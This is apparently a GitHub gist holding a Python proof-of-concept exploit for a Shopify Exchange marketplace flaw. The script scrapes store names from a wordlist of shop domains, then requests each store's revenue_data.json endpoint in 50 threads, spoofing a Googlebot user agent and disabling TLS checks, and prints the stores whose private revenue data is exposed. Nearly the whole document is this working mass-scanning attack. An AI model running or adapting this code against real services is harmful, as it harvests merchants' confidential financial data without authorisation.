Skip to content

Instantly share code, notes, and snippets.

@ayoubfathi
Last active April 25, 2019 22:59
Show Gist options
  • Save ayoubfathi/475ea41e364b91325734c28f0a2c7706 to your computer and use it in GitHub Desktop.
Save ayoubfathi/475ea41e364b91325734c28f0a2c7706 to your computer and use it in GitHub Desktop.
PoC for shopify vulnerability
import json
import requests
import bs4 as bs
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import ProcessPoolExecutor
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
_headers = {
'User-Agent': 'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
def myshopify(shops):
try:
source = requests.get("https://" + shops).text
soup = bs.BeautifulSoup(source, 'html.parser')
scripts = soup.find_all('script')
for script in scripts:
if 'window.Shopify.Checkout.apiHost' in script.text:
index1 = script.text.index('"')
index2 = script.text.index('myshopify')
StoreName = script.text[index1 + 1:index2 - 2]
with open('shops.txt', 'a') as output:
output.write(StoreName + "\n")
except BaseException:
pass
def almostvuln(StoreName):
POC_URL = "https://exchangemarketplace.com/shops/{}/revenue_data.json".format(
StoreName)
try:
_Response = requests.get(
POC_URL,
headers=_headers,
verify=False,
allow_redirects=True)
if _Response.status_code in [200, 304]:
vuln_stores.append(StoreName)
print(StoreName)
elif _Response.status_code == 404:
pass
else:
print(_Response.status_code)
except BaseException:
pass
return vuln_stores
if __name__ == '__main__':
try:
shops = [line.rstrip('\n') for line in open('wordlist.txt')]
with ThreadPoolExecutor(max_workers=50) as executor:
executor.map(myshopify, shops)
vuln_stores = [line.rstrip('\n') for line in open('shops.txt')]
with ThreadPoolExecutor(max_workers=50) as executor1:
executor1.map(almostvuln, vuln_stores)
except KeyboardInterrupt:
print("")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment